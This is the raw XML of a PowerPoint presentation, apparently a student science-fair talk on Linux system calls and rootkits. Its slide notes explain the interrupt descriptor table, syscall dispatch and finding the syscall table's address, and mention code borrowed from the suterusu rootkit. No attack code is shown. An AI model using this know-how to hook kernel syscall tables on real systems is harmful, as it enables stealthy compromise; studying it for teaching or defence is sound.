
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="xml" ContentType="application/xml"/>
  <Default Extension="bin" ContentType="application/vnd.openxmlformats-officedocument.presentationml.printerSettings"/>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4"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93455" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId52"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="278" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="262" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="257" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="263" r:id="rId14"/>
    <p:sldId id="258" r:id="rId15"/>
    <p:sldId id="266" r:id="rId16"/>
    <p:sldId id="267" r:id="rId17"/>
    <p:sldId id="268" r:id="rId18"/>
    <p:sldId id="270" r:id="rId19"/>
    <p:sldId id="271" r:id="rId20"/>
    <p:sldId id="285" r:id="rId21"/>
    <p:sldId id="272" r:id="rId22"/>
    <p:sldId id="279" r:id="rId23"/>
    <p:sldId id="274" r:id="rId24"/>
    <p:sldId id="286" r:id="rId25"/>
    <p:sldId id="296" r:id="rId26"/>
    <p:sldId id="273" r:id="rId27"/>
    <p:sldId id="275" r:id="rId28"/>
    <p:sldId id="283" r:id="rId29"/>
    <p:sldId id="292" r:id="rId30"/>
    <p:sldId id="293" r:id="rId31"/>
    <p:sldId id="294" r:id="rId32"/>
    <p:sldId id="295" r:id="rId33"/>
    <p:sldId id="276" r:id="rId34"/>
    <p:sldId id="281" r:id="rId35"/>
    <p:sldId id="280" r:id="rId36"/>
    <p:sldId id="287" r:id="rId37"/>
    <p:sldId id="282" r:id="rId38"/>
    <p:sldId id="289" r:id="rId39"/>
    <p:sldId id="290" r:id="rId40"/>
    <p:sldId id="297" r:id="rId41"/>
    <p:sldId id="284" r:id="rId42"/>
    <p:sldId id="298" r:id="rId43"/>
    <p:sldId id="300" r:id="rId44"/>
    <p:sldId id="301" r:id="rId45"/>
    <p:sldId id="302" r:id="rId46"/>
    <p:sldId id="288" r:id="rId47"/>
    <p:sldId id="304" r:id="rId48"/>
    <p:sldId id="305" r:id="rId49"/>
    <p:sldId id="299" r:id="rId50"/>
    <p:sldId id="303" r:id="rId5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393756A7-43A7-C34B-B64A-3D0B6F5E8AC3}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="259"/>
            <p14:sldId id="278"/>
            <p14:sldId id="260"/>
            <p14:sldId id="261"/>
            <p14:sldId id="262"/>
            <p14:sldId id="264"/>
            <p14:sldId id="257"/>
            <p14:sldId id="265"/>
            <p14:sldId id="263"/>
            <p14:sldId id="258"/>
            <p14:sldId id="266"/>
            <p14:sldId id="267"/>
            <p14:sldId id="268"/>
            <p14:sldId id="270"/>
            <p14:sldId id="271"/>
            <p14:sldId id="285"/>
            <p14:sldId id="272"/>
            <p14:sldId id="279"/>
            <p14:sldId id="274"/>
            <p14:sldId id="286"/>
            <p14:sldId id="296"/>
            <p14:sldId id="273"/>
            <p14:sldId id="275"/>
            <p14:sldId id="283"/>
            <p14:sldId id="292"/>
            <p14:sldId id="293"/>
            <p14:sldId id="294"/>
            <p14:sldId id="295"/>
            <p14:sldId id="276"/>
            <p14:sldId id="281"/>
            <p14:sldId id="280"/>
            <p14:sldId id="287"/>
            <p14:sldId id="282"/>
            <p14:sldId id="289"/>
            <p14:sldId id="290"/>
            <p14:sldId id="297"/>
            <p14:sldId id="284"/>
            <p14:sldId id="298"/>
            <p14:sldId id="300"/>
            <p14:sldId id="301"/>
            <p14:sldId id="302"/>
            <p14:sldId id="288"/>
            <p14:sldId id="304"/>
            <p14:sldId id="305"/>
            <p14:sldId id="299"/>
            <p14:sldId id="303"/>
          </p14:sldIdLst>
        </p14:section>
      </p14:sectionLst>
    </p:ex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Office User" initials="Office" lastIdx="1" clrIdx="0">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="2" name="Microsoft Office User" initials="Office [2]" lastIdx="1" clrIdx="1">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823" autoAdjust="0"/>
    <p:restoredTop sz="94678"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="110" d="100"/>
          <a:sy n="110" d="100"/>
        </p:scale>
        <p:origin x="128" y="-48"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="149" d="100"/>
        <a:sy n="149"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50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide46.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide47.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="printerSettings/printerSettings1.bin"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/commentAuthors" Target="commentAuthors.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide36.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide37.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide38.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide39.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide40.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide41.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide42.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide43.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide44.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide45.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37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide33.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide34.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide35.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5-03-12T09:48:15.609" idx="1">
    <p:pos x="10" y="10"/>
    <p:text>Science fair project</p:text>
    <p:extLst>
      <p:ext uri="{C676402C-5697-4E1C-873F-D02D1690AC5C}">
        <p15:threadingInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" timeZoneBias="24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D82C911-5363-104D-9DCB-DA8BF9A3484F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/28/16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8368311-2531-AC4E-963E-E3FE7A847D4B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1156947210"/>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Science project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{28368311-2531-AC4E-963E-E3FE7A847D4B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="440413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Don’t actually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> know what the image on the left is, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>btu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> it’s how an interrupt is handled. Callback function in the kernel, most likely super </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>optimzed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> assembly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>funciton</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{28368311-2531-AC4E-963E-E3FE7A847D4B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11313523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architecture of most modern processors, with the exception of some embedded systems, involves a security model. For example, the rings model specifies multiple privilege levels under which software may be executed: a program is usually limited to its own address space.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The startup_32() code found in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/boot/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>head.S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> starts everything off by calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>setup_idt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(). This routine allocates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> the IDT. Later, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>start_kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>() is ran, then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>trap_init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>() which initializes the IDT, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>At this point the interrupt vector for the system calls is not set up. It is initialized by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sched_init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>() (found in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/kernel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sched.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>). A call to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>set_system_gate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (0x80, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>system_call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>) sets interrupt 0x80 to be a vector to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>system_call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>() entry point.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{28368311-2531-AC4E-963E-E3FE7A847D4B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5681222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8368311-2531-AC4E-963E-E3FE7A847D4B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="711851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8368311-2531-AC4E-963E-E3FE7A847D4B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21304638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system call table is defined in unistd_64,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> tells the kernels what functions to call when a system call is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sexecuted</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28368311-2531-AC4E-963E-E3FE7A847D4B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2693657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what the system call table looks like. When</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the system call interrupt is executed in assembly, the value in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> register is read, and depending on the value, a different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is ran. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{28368311-2531-AC4E-963E-E3FE7A847D4B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17537799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took this code from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>suterusu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> rootkit </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{28368311-2531-AC4E-963E-E3FE7A847D4B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5115746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Now we have the table’s address: but if you have looked at the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
